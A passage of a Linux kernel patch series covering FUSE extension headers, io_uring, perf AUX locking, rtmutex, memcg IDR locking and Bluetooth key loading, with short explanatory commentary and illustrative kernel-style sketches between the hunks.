+ /* bits 32..63 get shifted down 32 bits into the flags2 field */
+ #define FUSE_SECURITY_CTX	(1ULL << 32)
+ #define FUSE_HAS_INODE_DAX	(1ULL << 33)
++#define FUSE_HAS_EXPIRE_ONLY	(1ULL << 35)
+ 
+ /**
+  * CUSE INIT request/reply flags
+@@ -491,6 +502,21 @@ struct fuse_file_lock {
+  */
+ #define FUSE_SETXATTR_ACL_KILL_SGID	(1 << 0)
+ 
++/**
++ * notify_inval_entry flags
++ * FUSE_EXPIRE_ONLY
++ */
++#define FUSE_EXPIRE_ONLY		(1 << 0)
++
++/**
++ * extension type
++ * FUSE_MAX_NR_SECCTX: maximum value of &fuse_secctx_header.nr_secctx
++ */
++enum fuse_ext_type {
++	/* Types 0..31 are reserved for fuse_secctx_header */
++	FUSE_MAX_NR_SECCTX	= 31,
++};
++
+ enum fuse_opcode {
+ 	FUSE_LOOKUP		= 1,
+ 	FUSE_FORGET		= 2,  /* no reply */
+@@ -874,7 +900,8 @@ struct fuse_in_header {
+ 	uint32_t	uid;
+ 	uint32_t	gid;
+ 	uint32_t	pid;
+-	uint32_t	padding;
++	uint16_t	total_extlen; /* length of extensions in 8byte units */
++	uint16_t	padding;
+ };
+ 
+ struct fuse_out_header {
+@@ -919,7 +946,7 @@ struct fuse_notify_inval_inode_out {
+ struct fuse_notify_inval_entry_out {
+ 	uint64_t	parent;
+ 	uint32_t	namelen;
+-	uint32_t	padding;
++	uint32_t	flags;
+ };
+ 
+ struct fuse_notify_delete_out {
+@@ -1035,4 +1062,17 @@ struct fuse_secctx_header {
+ 	uint32_t	nr_secctx;
+ };
+ 
++/**
++ * struct fuse_ext_header - extension header
++ * @size: total size of this extension including this header
++ * @type: type of extension
++ *
++ * This is made compatible with fuse_secctx_header by using type values >
++ * FUSE_MAX_NR_SECCTX
++ */
++struct fuse_ext_header {
++	uint32_t	size;
++	uint32_t	type;
++};
++
+ #endif /* _LINUX_FUSE_H */
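
Because total_extlen counts 8-byte units, every extension, including the security-context block built by get_create_ext() above, must be padded to a multiple of 8. A hypothetical server-side walk over the extension area, showing how fuse_ext_header and the legacy fuse_secctx_header coexist:

static void walk_extensions(const unsigned char *p, uint16_t total_extlen)
{
	size_t remaining = (size_t)total_extlen * 8;	/* 8-byte units */

	while (remaining >= sizeof(struct fuse_ext_header)) {
		const struct fuse_ext_header *xh = (const void *)p;

		if (xh->size < sizeof(*xh) || xh->size > remaining)
			break;			/* malformed: stop parsing */
		if (xh->type <= FUSE_MAX_NR_SECCTX)
			handle_secctx(p);	/* hypothetical; header doubles
						 * as fuse_secctx_header */
		p += xh->size;
		remaining -= xh->size;
	}
}
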
+diff --git a/io_uring/io-wq.c b/io_uring/io-wq.c
+index 04503118cdc10..139cd49b2c270 100644
+--- a/io_uring/io-wq.c
++++ b/io_uring/io-wq.c
+@@ -628,7 +628,7 @@ static int io_wqe_worker(void *data)
+ 	struct io_wqe_acct *acct = io_wqe_get_acct(worker);
+ 	struct io_wqe *wqe = worker->wqe;
+ 	struct io_wq *wq = wqe->wq;
+-	bool last_timeout = false;
++	bool exit_mask = false, last_timeout = false;
+ 	char buf[TASK_COMM_LEN];
+ 
+ 	worker->flags |= (IO_WORKER_F_UP | IO_WORKER_F_RUNNING);
+@@ -644,8 +644,11 @@ static int io_wqe_worker(void *data)
+ 			io_worker_handle_work(worker);
+ 
+ 		raw_spin_lock(&wqe->lock);
+-		/* timed out, exit unless we're the last worker */
+-		if (last_timeout && acct->nr_workers > 1) {
++		/*
++		 * Last sleep timed out. Exit if we're not the last worker,
++		 * or if someone modified our affinity.
++		 */
++		if (last_timeout && (exit_mask || acct->nr_workers > 1)) {
+ 			acct->nr_workers--;
+ 			raw_spin_unlock(&wqe->lock);
+ 			__set_current_state(TASK_RUNNING);
+@@ -664,7 +667,11 @@ static int io_wqe_worker(void *data)
+ 				continue;
+ 			break;
+ 		}
+-		last_timeout = !ret;
++		if (!ret) {
++			last_timeout = true;
++			exit_mask = !cpumask_test_cpu(raw_smp_processor_id(),
++							wqe->cpu_mask);
++		}
+ 	}
+ 
+ 	if (test_bit(IO_WQ_BIT_EXIT, &wq->state))
+@@ -716,7 +723,6 @@ static void io_init_new_worker(struct io_wqe *wqe, struct io_worker *worker,
+ 	tsk->worker_private = worker;
+ 	worker->task = tsk;
+ 	set_cpus_allowed_ptr(tsk, wqe->cpu_mask);
+-	tsk->flags |= PF_NO_SETAFFINITY;
+ 
+ 	raw_spin_lock(&wqe->lock);
+ 	hlist_nulls_add_head_rcu(&worker->nulls_node, &wqe->free_list);
+diff --git a/io_uring/sqpoll.c b/io_uring/sqpoll.c
+index 11610a70573ab..6ea21b5031138 100644
+--- a/io_uring/sqpoll.c
++++ b/io_uring/sqpoll.c
+@@ -233,7 +233,6 @@ static int io_sq_thread(void *data)
+ 		set_cpus_allowed_ptr(current, cpumask_of(sqd->sq_cpu));
+ 	else
+ 		set_cpus_allowed_ptr(current, cpu_online_mask);
+-	current->flags |= PF_NO_SETAFFINITY;
+ 
+ 	/*
+ 	 * Force audit context to get setup, in case we do prep side async
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index bb88fd2266a86..95a050446f271 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -466,10 +466,16 @@ static bool btf_type_is_fwd(const struct btf_type *t)
+ 	return BTF_INFO_KIND(t->info) == BTF_KIND_FWD;
+ }
+ 
++static bool btf_type_is_decl_tag(const struct btf_type *t)
++{
++	return BTF_INFO_KIND(t->info) == BTF_KIND_DECL_TAG;
++}
++
+ static bool btf_type_nosize(const struct btf_type *t)
+ {
+ 	return btf_type_is_void(t) || btf_type_is_fwd(t) ||
+-	       btf_type_is_func(t) || btf_type_is_func_proto(t);
++	       btf_type_is_func(t) || btf_type_is_func_proto(t) ||
++	       btf_type_is_decl_tag(t);
+ }
+ 
+ static bool btf_type_nosize_or_null(const struct btf_type *t)
+@@ -492,11 +498,6 @@ static bool btf_type_is_datasec(const struct btf_type *t)
+ 	return BTF_INFO_KIND(t->info) == BTF_KIND_DATASEC;
+ }
+ 
+-static bool btf_type_is_decl_tag(const struct btf_type *t)
+-{
+-	return BTF_INFO_KIND(t->info) == BTF_KIND_DECL_TAG;
+-}
+-
+ static bool btf_type_is_decl_tag_target(const struct btf_type *t)
+ {
+ 	return btf_type_is_func(t) || btf_type_is_struct(t) ||
+diff --git a/kernel/cgroup/cgroup.c b/kernel/cgroup/cgroup.c
+index 455f67ff31b57..f6656fd410d0f 100644
+--- a/kernel/cgroup/cgroup.c
++++ b/kernel/cgroup/cgroup.c
+@@ -1852,9 +1852,9 @@ int rebind_subsystems(struct cgroup_root *dst_root, u16 ss_mask)
+ 		RCU_INIT_POINTER(scgrp->subsys[ssid], NULL);
+ 		rcu_assign_pointer(dcgrp->subsys[ssid], css);
+ 		ss->root = dst_root;
+-		css->cgroup = dcgrp;
+ 
+ 		spin_lock_irq(&css_set_lock);
++		css->cgroup = dcgrp;
+ 		WARN_ON(!list_empty(&dcgrp->e_csets[ss->id]));
+ 		list_for_each_entry_safe(cset, cset_pos, &scgrp->e_csets[ss->id],
+ 					 e_cset_node[ss->id]) {
+diff --git a/kernel/dma/map_benchmark.c b/kernel/dma/map_benchmark.c
+index dafdc47ae5fcc..3efdc5cfe390c 100644
+--- a/kernel/dma/map_benchmark.c
++++ b/kernel/dma/map_benchmark.c
+@@ -89,6 +89,22 @@ static int map_benchmark_thread(void *data)
+ 		atomic64_add(map_sq, &map->sum_sq_map);
+ 		atomic64_add(unmap_sq, &map->sum_sq_unmap);
+ 		atomic64_inc(&map->loops);
++
++		/*
++		 * We may test for a long time, so periodically check whether
++		 * we need to schedule to avoid starving the others. Otherwise
++		 * we may hang the kernel on a non-preemptible build: when the
++		 * number of test kthreads is >= the number of CPUs, the test
++		 * kthreads will run endlessly on every CPU, since the thread
++		 * responsible for notifying the kthreads to stop (in
++		 * do_map_benchmark()) could never be scheduled.
++		 *
++		 * Note this may degrade the test concurrency since the test
++		 * threads may need to share the CPU time with other load
++		 * in the system. So it's recommended to run this benchmark
++		 * on an idle system.
++		 */
++		cond_resched();
+ 	}
+ 
+ out:
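
The general shape of the fix: a measurement kthread that never sleeps must still yield, or on a non-preemptible kernel the thread calling kthread_stop() may never run and the stop request is never observed. Sketch (the work callback is hypothetical):

static int bench_thread(void *data)
{
	while (!kthread_should_stop()) {
		run_one_iteration(data);	/* hypothetical measurement */
		cond_resched();			/* let the stopper run */
	}
	return 0;
}
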
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index ba099d5b41cd9..0e9f1377cec7f 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -1277,8 +1277,9 @@ static void put_ctx(struct perf_event_context *ctx)
+  *	  perf_event_context::mutex
+  *	    perf_event::child_mutex;
+  *	      perf_event_context::lock
+- *	    perf_event::mmap_mutex
+  *	    mmap_lock
++ *	      perf_event::mmap_mutex
++ *	        perf_buffer::aux_mutex
+  *	      perf_addr_filters_head::lock
+  *
+  *    cpu_hotplug_lock
+@@ -6181,12 +6182,11 @@ static void perf_mmap_close(struct vm_area_struct *vma)
+ 		event->pmu->event_unmapped(event, vma->vm_mm);
+ 
+ 	/*
+-	 * rb->aux_mmap_count will always drop before rb->mmap_count and
+-	 * event->mmap_count, so it is ok to use event->mmap_mutex to
+-	 * serialize with perf_mmap here.
++	 * The AUX buffer is strictly a sub-buffer, serialize using aux_mutex
++	 * to avoid complications.
+ 	 */
+ 	if (rb_has_aux(rb) && vma->vm_pgoff == rb->aux_pgoff &&
+-	    atomic_dec_and_mutex_lock(&rb->aux_mmap_count, &event->mmap_mutex)) {
++	    atomic_dec_and_mutex_lock(&rb->aux_mmap_count, &rb->aux_mutex)) {
+ 		/*
+ 		 * Stop all AUX events that are writing to this buffer,
+ 		 * so that we can free its AUX pages and corresponding PMU
+@@ -6203,7 +6203,7 @@ static void perf_mmap_close(struct vm_area_struct *vma)
+ 		rb_free_aux(rb);
+ 		WARN_ON_ONCE(refcount_read(&rb->aux_refcount));
+ 
+-		mutex_unlock(&event->mmap_mutex);
++		mutex_unlock(&rb->aux_mutex);
+ 	}
+ 
+ 	if (atomic_dec_and_test(&rb->mmap_count))
+@@ -6291,6 +6291,7 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
+ 	struct perf_event *event = file->private_data;
+ 	unsigned long user_locked, user_lock_limit;
+ 	struct user_struct *user = current_user();
++	struct mutex *aux_mutex = NULL;
+ 	struct perf_buffer *rb = NULL;
+ 	unsigned long locked, lock_limit;
+ 	unsigned long vma_size;
+@@ -6339,6 +6340,9 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
+ 		if (!rb)
+ 			goto aux_unlock;
+ 
++		aux_mutex = &rb->aux_mutex;
++		mutex_lock(aux_mutex);
++
+ 		aux_offset = READ_ONCE(rb->user_page->aux_offset);
+ 		aux_size = READ_ONCE(rb->user_page->aux_size);
+ 
+@@ -6489,6 +6493,8 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
+ 		atomic_dec(&rb->mmap_count);
+ 	}
+ aux_unlock:
++	if (aux_mutex)
++		mutex_unlock(aux_mutex);
+ 	mutex_unlock(&event->mmap_mutex);
+ 
+ 	/*
+diff --git a/kernel/events/internal.h b/kernel/events/internal.h
+index 386d21c7edfa0..f376b057320ce 100644
+--- a/kernel/events/internal.h
++++ b/kernel/events/internal.h
+@@ -40,6 +40,7 @@ struct perf_buffer {
+ 	struct user_struct		*mmap_user;
+ 
+ 	/* AUX area */
++	struct mutex			aux_mutex;
+ 	long				aux_head;
+ 	unsigned int			aux_nest;
+ 	long				aux_wakeup;	/* last aux_watermark boundary crossed by aux_head */
+diff --git a/kernel/events/ring_buffer.c b/kernel/events/ring_buffer.c
+index f3a3c294ff2b3..98588e96b5919 100644
+--- a/kernel/events/ring_buffer.c
++++ b/kernel/events/ring_buffer.c
+@@ -332,6 +332,8 @@ ring_buffer_init(struct perf_buffer *rb, long watermark, int flags)
+ 	 */
+ 	if (!rb->nr_pages)
+ 		rb->paused = 1;
++
++	mutex_init(&rb->aux_mutex);
+ }
+ 
+ void perf_aux_output_flag(struct perf_output_handle *handle, u64 flags)
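
Taken together, these perf changes hang AUX teardown off a dedicated
per-buffer mutex rather than event->mmap_mutex. The last-reference idiom
they rely on looks like this in isolation (a sketch only; struct buf and
free_buf_pages() are hypothetical names, not from the patch):

    #include <linux/atomic.h>
    #include <linux/mutex.h>

    struct buf {
        atomic_t     users;
        struct mutex lock;      /* per-buffer, like rb->aux_mutex */
    };

    static void buf_put(struct buf *b)
    {
        /* Returns true, with b->lock held, only for the final reference. */
        if (atomic_dec_and_mutex_lock(&b->users, &b->lock)) {
            free_buf_pages(b);  /* hypothetical teardown step */
            mutex_unlock(&b->lock);
        }
    }
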
+diff --git a/kernel/events/uprobes.c b/kernel/events/uprobes.c
+index d9e357b7e17c9..f8bda852c6b48 100644
+--- a/kernel/events/uprobes.c
++++ b/kernel/events/uprobes.c
+@@ -1483,7 +1483,7 @@ static struct xol_area *__create_xol_area(unsigned long vaddr)
+ 	uprobe_opcode_t insn = UPROBE_SWBP_INSN;
+ 	struct xol_area *area;
+ 
+-	area = kmalloc(sizeof(*area), GFP_KERNEL);
++	area = kzalloc(sizeof(*area), GFP_KERNEL);
+ 	if (unlikely(!area))
+ 		goto out;
+ 
+@@ -1493,7 +1493,6 @@ static struct xol_area *__create_xol_area(unsigned long vaddr)
+ 		goto free_area;
+ 
+ 	area->xol_mapping.name = "[uprobes]";
+-	area->xol_mapping.fault = NULL;
+ 	area->xol_mapping.pages = area->pages;
+ 	area->pages[0] = alloc_page(GFP_HIGHUSER);
+ 	if (!area->pages[0])
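
Switching __create_xol_area() to kzalloc() means every field the code does
not set explicitly (such as xol_mapping.fault, whose store is deleted above)
starts out zero. A minimal sketch of the idiom, with a hypothetical struct foo:

    struct foo *f = kzalloc(sizeof(*f), GFP_KERNEL);

    if (!f)
        return -ENOMEM;
    /* every pointer member of *f is NULL, every counter is 0 */
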
+diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
+index 21db0df0eb000..bf3a28ee7d8f4 100644
+--- a/kernel/locking/rtmutex.c
++++ b/kernel/locking/rtmutex.c
+@@ -1624,6 +1624,7 @@ static int __sched rt_mutex_slowlock_block(struct rt_mutex_base *lock,
+ }
+ 
+ static void __sched rt_mutex_handle_deadlock(int res, int detect_deadlock,
++					     struct rt_mutex_base *lock,
+ 					     struct rt_mutex_waiter *w)
+ {
+ 	/*
+@@ -1636,10 +1637,10 @@ static void __sched rt_mutex_handle_deadlock(int res, int detect_deadlock,
+ 	if (build_ww_mutex() && w->ww_ctx)
+ 		return;
+ 
+-	/*
+-	 * Yell loudly and stop the task right here.
+-	 */
++	raw_spin_unlock_irq(&lock->wait_lock);
++
+ 	WARN(1, "rtmutex deadlock detected\n");
++
+ 	while (1) {
+ 		set_current_state(TASK_INTERRUPTIBLE);
+ 		schedule();
+@@ -1693,7 +1694,7 @@ static int __sched __rt_mutex_slowlock(struct rt_mutex_base *lock,
+ 	} else {
+ 		__set_current_state(TASK_RUNNING);
+ 		remove_waiter(lock, waiter);
+-		rt_mutex_handle_deadlock(ret, chwalk, waiter);
++		rt_mutex_handle_deadlock(ret, chwalk, lock, waiter);
+ 	}
+ 
+ 	/*
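
The rtmutex fix drops the wait_lock before parking the deadlocked task
forever: sleeping in schedule() while still holding a raw spinlock would
wedge every other waiter on that lock. Schematically (a sketch mirroring
the hunk above, not additional kernel code):

    raw_spin_unlock_irq(&lock->wait_lock);  /* release before sleeping */
    WARN(1, "deadlock detected\n");
    for (;;) {
        set_current_state(TASK_INTERRUPTIBLE);
        schedule();     /* loop re-sleeps even if woken by a signal */
    }
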
+diff --git a/kernel/resource.c b/kernel/resource.c
+index 8f52f88009652..6aed1ca801829 100644
+--- a/kernel/resource.c
++++ b/kernel/resource.c
+@@ -1781,8 +1781,7 @@ static resource_size_t gfr_start(struct resource *base, resource_size_t size,
+ 	if (flags & GFR_DESCENDING) {
+ 		resource_size_t end;
+ 
+-		end = min_t(resource_size_t, base->end,
+-			    (1ULL << MAX_PHYSMEM_BITS) - 1);
++		end = min_t(resource_size_t, base->end, PHYSMEM_END);
+ 		return end - size + 1;
+ 	}
+ 
+@@ -1799,8 +1798,7 @@ static bool gfr_continue(struct resource *base, resource_size_t addr,
+ 	 * @size did not wrap 0.
+ 	 */
+ 	return addr > addr - size &&
+-	       addr <= min_t(resource_size_t, base->end,
+-			     (1ULL << MAX_PHYSMEM_BITS) - 1);
++	       addr <= min_t(resource_size_t, base->end, PHYSMEM_END);
+ }
+ 
+ static resource_size_t gfr_next(resource_size_t addr, resource_size_t size,
+diff --git a/kernel/smp.c b/kernel/smp.c
+index 63e466bb6b03a..0acd433afa7bc 100644
+--- a/kernel/smp.c
++++ b/kernel/smp.c
+@@ -1262,6 +1262,7 @@ int smp_call_on_cpu(unsigned int cpu, int (*func)(void *), void *par, bool phys)
+ 
+ 	queue_work_on(cpu, system_wq, &sscs.work);
+ 	wait_for_completion(&sscs.done);
++	destroy_work_on_stack(&sscs.work);
+ 
+ 	return sscs.ret;
+ }
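
smp_call_on_cpu() uses an on-stack work item, which (with
CONFIG_DEBUG_OBJECTS_WORK) must be explicitly destroyed once it has
finished. The pairing looks like this (a sketch; my_work_fn is a
hypothetical handler):

    #include <linux/workqueue.h>

    static void my_work_fn(struct work_struct *work)
    {
        /* hypothetical work body */
    }

    static void run_on_stack_work(void)
    {
        struct work_struct work;

        INIT_WORK_ONSTACK(&work, my_work_fn);
        queue_work(system_wq, &work);
        flush_work(&work);              /* wait for it to complete */
        destroy_work_on_stack(&work);   /* pairs with INIT_WORK_ONSTACK */
    }
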
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index f2b00ea38111a..c9b52e920b8f3 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -4088,6 +4088,8 @@ void tracing_iter_reset(struct trace_iterator *iter, int cpu)
+ 			break;
+ 		entries++;
+ 		ring_buffer_iter_advance(buf_iter);
++		/* This could be a big loop */
++		cond_resched();
+ 	}
+ 
+ 	per_cpu_ptr(iter->array_buffer->data, cpu)->skipped_entries = entries;
+diff --git a/kernel/workqueue.c b/kernel/workqueue.c
+index f3b6ac232e219..93303148a434f 100644
+--- a/kernel/workqueue.c
++++ b/kernel/workqueue.c
+@@ -5891,10 +5891,18 @@ static void wq_watchdog_timer_fn(struct timer_list *unused)
+ 
+ notrace void wq_watchdog_touch(int cpu)
+ {
++	unsigned long thresh = READ_ONCE(wq_watchdog_thresh) * HZ;
++	unsigned long touch_ts = READ_ONCE(wq_watchdog_touched);
++	unsigned long now = jiffies;
++
+ 	if (cpu >= 0)
+-		per_cpu(wq_watchdog_touched_cpu, cpu) = jiffies;
++		per_cpu(wq_watchdog_touched_cpu, cpu) = now;
++	else
++		WARN_ONCE(1, "%s should be called with valid CPU", __func__);
+ 
+-	wq_watchdog_touched = jiffies;
++	/* Don't unnecessarily store to global cacheline */
++	if (time_after(now, touch_ts + thresh / 4))
++		WRITE_ONCE(wq_watchdog_touched, jiffies);
+ }
+ 
+ static void wq_watchdog_set_thresh(unsigned long thresh)
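
The watchdog-touch change avoids dirtying a globally shared cacheline on
every call by skipping the store while the stamp is still fresh. The
throttling idiom, in isolation (a sketch; shared_ts is a hypothetical name):

    #include <linux/jiffies.h>

    static unsigned long shared_ts;     /* hot, read by all CPUs */

    static void touch_shared(unsigned long thresh_jiffies)
    {
        unsigned long old = READ_ONCE(shared_ts);

        /* Only write once a quarter of the threshold has elapsed. */
        if (time_after(jiffies, old + thresh_jiffies / 4))
            WRITE_ONCE(shared_ts, jiffies);
    }
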
+diff --git a/lib/generic-radix-tree.c b/lib/generic-radix-tree.c
+index 7dfa88282b006..78f081d695d0b 100644
+--- a/lib/generic-radix-tree.c
++++ b/lib/generic-radix-tree.c
+@@ -131,6 +131,8 @@ void *__genradix_ptr_alloc(struct __genradix *radix, size_t offset,
+ 		if ((v = cmpxchg_release(&radix->root, r, new_root)) == r) {
+ 			v = new_root;
+ 			new_node = NULL;
++		} else {
++			new_node->children[0] = NULL;
+ 		}
+ 	}
+ 
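
The genradix fix handles the cmpxchg loser: the locally built node was
pre-pointed at the old root, so when another CPU installs its root first,
that stashed pointer must be cleared before the node is kept for reuse.
Schematically (a sketch with hypothetical names):

    new_node->children[0] = old_root;   /* optimistic link */
    if (cmpxchg_release(&tree->root, old_root, new_node) != old_root) {
        /* Lost the race: unlink old_root so the cached node is clean. */
        new_node->children[0] = NULL;
    }
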
+diff --git a/mm/memcontrol.c b/mm/memcontrol.c
+index 4ad6e8345b364..280bb6969c0bf 100644
+--- a/mm/memcontrol.c
++++ b/mm/memcontrol.c
+@@ -5143,11 +5143,28 @@ static struct cftype mem_cgroup_legacy_files[] = {
+  */
+ 
+ static DEFINE_IDR(mem_cgroup_idr);
++static DEFINE_SPINLOCK(memcg_idr_lock);
++
++static int mem_cgroup_alloc_id(void)
++{
++	int ret;
++
++	idr_preload(GFP_KERNEL);
++	spin_lock(&memcg_idr_lock);
++	ret = idr_alloc(&mem_cgroup_idr, NULL, 1, MEM_CGROUP_ID_MAX + 1,
++			GFP_NOWAIT);
++	spin_unlock(&memcg_idr_lock);
++	idr_preload_end();
++	return ret;
++}
+ 
+ static void mem_cgroup_id_remove(struct mem_cgroup *memcg)
+ {
+ 	if (memcg->id.id > 0) {
++		spin_lock(&memcg_idr_lock);
+ 		idr_remove(&mem_cgroup_idr, memcg->id.id);
++		spin_unlock(&memcg_idr_lock);
++
+ 		memcg->id.id = 0;
+ 	}
+ }
+@@ -5270,8 +5287,7 @@ static struct mem_cgroup *mem_cgroup_alloc(void)
+ 	if (!memcg)
+ 		return ERR_PTR(error);
+ 
+-	memcg->id.id = idr_alloc(&mem_cgroup_idr, NULL,
+-				 1, MEM_CGROUP_ID_MAX + 1, GFP_KERNEL);
++	memcg->id.id = mem_cgroup_alloc_id();
+ 	if (memcg->id.id < 0) {
+ 		error = memcg->id.id;
+ 		goto fail;
+@@ -5316,7 +5332,9 @@ static struct mem_cgroup *mem_cgroup_alloc(void)
+ 	INIT_LIST_HEAD(&memcg->deferred_split_queue.split_queue);
+ 	memcg->deferred_split_queue.split_queue_len = 0;
+ #endif
++	spin_lock(&memcg_idr_lock);
+ 	idr_replace(&mem_cgroup_idr, memcg, memcg->id.id);
++	spin_unlock(&memcg_idr_lock);
+ 	lru_gen_init_memcg(memcg);
+ 	return memcg;
+ fail:
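
The memcg change serializes all IDR mutations behind a spinlock while still
letting the allocation path sleep, via idr_preload(). This is the standard
pattern (a sketch; the names are hypothetical):

    #include <linux/idr.h>
    #include <linux/spinlock.h>

    static DEFINE_IDR(my_idr);
    static DEFINE_SPINLOCK(my_idr_lock);

    static int my_alloc_id(void)
    {
        int id;

        idr_preload(GFP_KERNEL);        /* may sleep: preallocate here */
        spin_lock(&my_idr_lock);
        id = idr_alloc(&my_idr, NULL, 1, 1024, GFP_NOWAIT);
        spin_unlock(&my_idr_lock);
        idr_preload_end();

        return id;                      /* negative errno on failure */
    }
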
+diff --git a/mm/memory_hotplug.c b/mm/memory_hotplug.c
+index 3b9d3a4b43869..dc17618bad8b9 100644
+--- a/mm/memory_hotplug.c
++++ b/mm/memory_hotplug.c
+@@ -1530,7 +1530,7 @@ struct range __weak arch_get_mappable_range(void)
+ 
+ struct range mhp_get_pluggable_range(bool need_mapping)
+ {
+-	const u64 max_phys = (1ULL << MAX_PHYSMEM_BITS) - 1;
++	const u64 max_phys = PHYSMEM_END;
+ 	struct range mhp_range;
+ 
+ 	if (need_mapping) {
+diff --git a/mm/sparse.c b/mm/sparse.c
+index 05d1e7b6c6dba..c803e318f50b5 100644
+--- a/mm/sparse.c
++++ b/mm/sparse.c
+@@ -129,7 +129,7 @@ static inline int sparse_early_nid(struct mem_section *section)
+ static void __meminit mminit_validate_memmodel_limits(unsigned long *start_pfn,
+ 						unsigned long *end_pfn)
+ {
+-	unsigned long max_sparsemem_pfn = 1UL << (MAX_PHYSMEM_BITS-PAGE_SHIFT);
++	unsigned long max_sparsemem_pfn = (PHYSMEM_END + 1) >> PAGE_SHIFT;
+ 
+ 	/*
+ 	 * Sanity checks - do not allow an architecture to pass
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index 5b8adfb36e207..c5a3a336515e7 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -2900,16 +2900,6 @@ static int load_link_keys(struct sock *sk, struct hci_dev *hdev, void *data,
+ 	bt_dev_dbg(hdev, "debug_keys %u key_count %u", cp->debug_keys,
+ 		   key_count);
+ 
+-	for (i = 0; i < key_count; i++) {
+-		struct mgmt_link_key_info *key = &cp->keys[i];
+-
+-		/* Considering SMP over BREDR/LE, there is no need to check addr_type */
+-		if (key->type > 0x08)
+-			return mgmt_cmd_status(sk, hdev->id,
+-					       MGMT_OP_LOAD_LINK_KEYS,
+-					       MGMT_STATUS_INVALID_PARAMS);
+-	}
+-
+ 	hci_dev_lock(hdev);
+ 
+ 	hci_link_keys_clear(hdev);
+@@ -2934,6 +2924,19 @@ static int load_link_keys(struct sock *sk, struct hci_dev *hdev, void *data,
+ 			continue;
+ 		}
+ 
++		if (key->addr.type != BDADDR_BREDR) {
++			bt_dev_warn(hdev,
++				    "Invalid link address type %u for %pMR",
++				    key->addr.type, &key->addr.bdaddr);
++			continue;
++		}
++
++		if (key->type > 0x08) {
++			bt_dev_warn(hdev, "Invalid link key type %u for %pMR",
++				    key->type, &key->addr.bdaddr);
++			continue;
++		}
++
+ 		/* Always ignore debug keys and require a new pairing if
+ 		 * the user wants to use them.
+ 		 */
+@@ -7141,7 +7144,6 @@ static int load_irks(struct sock *sk, struct hci_dev *hdev, void *cp_data,
+ 
+ 	for (i = 0; i < irk_count; i++) {
+ 		struct mgmt_irk_info *irk = &cp->irks[i];
+-		u8 addr_type = le_addr_type(irk->addr.type);
+ 
+ 		if (hci_is_blocked_key(hdev,
+ 				       HCI_BLOCKED_KEY_TYPE_IRK,
+@@ -7151,12 +7153,8 @@ static int load_irks(struct sock *sk, struct hci_dev *hdev, void *cp_data,
+ 			continue;
+ 		}
+ 
+-		/* When using SMP over BR/EDR, the addr type should be set to BREDR */
+-		if (irk->addr.type == BDADDR_BREDR)
+-			addr_type = BDADDR_BREDR;
+-
+ 		hci_add_irk(hdev, &irk->addr.bdaddr,
+-			    addr_type, irk->val,
++			    le_addr_type(irk->addr.type), irk->val,
+ 			    BDADDR_ANY);
+ 	}
+ 
+@@ -7221,15 +7219,6 @@ static int load_long_term_keys(struct sock *sk, struct hci_dev *hdev,
+ 
+ 	bt_dev_dbg(hdev, "key_count %u", key_count);
+ 
+-	for (i = 0; i < key_count; i++) {
+-		struct mgmt_ltk_info *key = &cp->keys[i];
+-
+-		if (!ltk_is_valid(key))
+-			return mgmt_cmd_status(sk, hdev->id,
+-					       MGMT_OP_LOAD_LONG_TERM_KEYS,
+-					       MGMT_STATUS_INVALID_PARAMS);
+-	}
+-
+ 	hci_dev_lock(hdev);
+ 
+ 	hci_smp_ltks_clear(hdev);
+@@ -7237,7 +7226,6 @@ static int load_long_term_keys(struct sock *sk, struct hci_dev *hdev,
+ 	for (i = 0; i < key_count; i++) {
+ 		struct mgmt_ltk_info *key = &cp->keys[i];
+ 		u8 type, authenticated;
+-		u8 addr_type = le_addr_type(key->addr.type);
+ 
+ 		if (hci_is_blocked_key(hdev,
+ 				       HCI_BLOCKED_KEY_TYPE_LTK,
+@@ -7247,6 +7235,12 @@ static int load_long_term_keys(struct sock *sk, struct hci_dev *hdev,
+ 			continue;
+ 		}
+ 
++		if (!ltk_is_valid(key)) {
++			bt_dev_warn(hdev, "Invalid LTK for %pMR",
++				    &key->addr.bdaddr);
++			continue;
++		}
++
+ 		switch (key->type) {
+ 		case MGMT_LTK_UNAUTHENTICATED:
+ 			authenticated = 0x00;
+@@ -7272,12 +7266,8 @@ static int load_long_term_keys(struct sock *sk, struct hci_dev *hdev,
+ 			continue;
+ 		}
+ 
+-		/* When using SMP over BR/EDR, the addr type should be set to BREDR */
+-		if (key->addr.type == BDADDR_BREDR)
+-			addr_type = BDADDR_BREDR;
+-
+ 		hci_add_ltk(hdev, &key->addr.bdaddr,
+-			    addr_type, type, authenticated,
++			    le_addr_type(key->addr.type), type, authenticated,
+ 			    key->val, key->enc_size, key->ediv, key->rand);
+ 	}
+ 
+@@ -9545,7 +9535,7 @@ void mgmt_new_link_key(struct hci_dev *hdev, struct link_key *key,
+ 
+ 	ev.store_hint = persistent;
+ 	bacpy(&ev.key.addr.bdaddr, &key->bdaddr);
+-	ev.key.addr.type = link_to_bdaddr(key->link_type, key->bdaddr_type);
++	ev.key.addr.type = BDADDR_BREDR;
+ 	ev.key.type = key->type;
+ 	memcpy(ev.key.val, key->val, HCI_LINK_KEY_SIZE);
+ 	ev.key.pin_len = key->pin_len;
+@@ -9596,7 +9586,7 @@ void mgmt_new_ltk(struct hci_dev *hdev, struct smp_ltk *key, bool persistent)
+ 		ev.store_hint = persistent;
+ 
+ 	bacpy(&ev.key.addr.bdaddr, &key->bdaddr);
+-	ev.key.addr.type = link_to_bdaddr(key->link_type, key->bdaddr_type);
++	ev.key.addr.type = link_to_bdaddr(LE_LINK, key->bdaddr_type);
+ 	ev.key.type = mgmt_ltk_type(key);
+ 	ev.key.enc_size = key->enc_size;
+ 	ev.key.ediv = key->ediv;
+@@ -9625,7 +9615,7 @@ void mgmt_new_irk(struct hci_dev *hdev, struct smp_irk *irk, bool persistent)
+ 
+ 	bacpy(&ev.rpa, &irk->rpa);
+ 	bacpy(&ev.irk.addr.bdaddr, &irk->bdaddr);
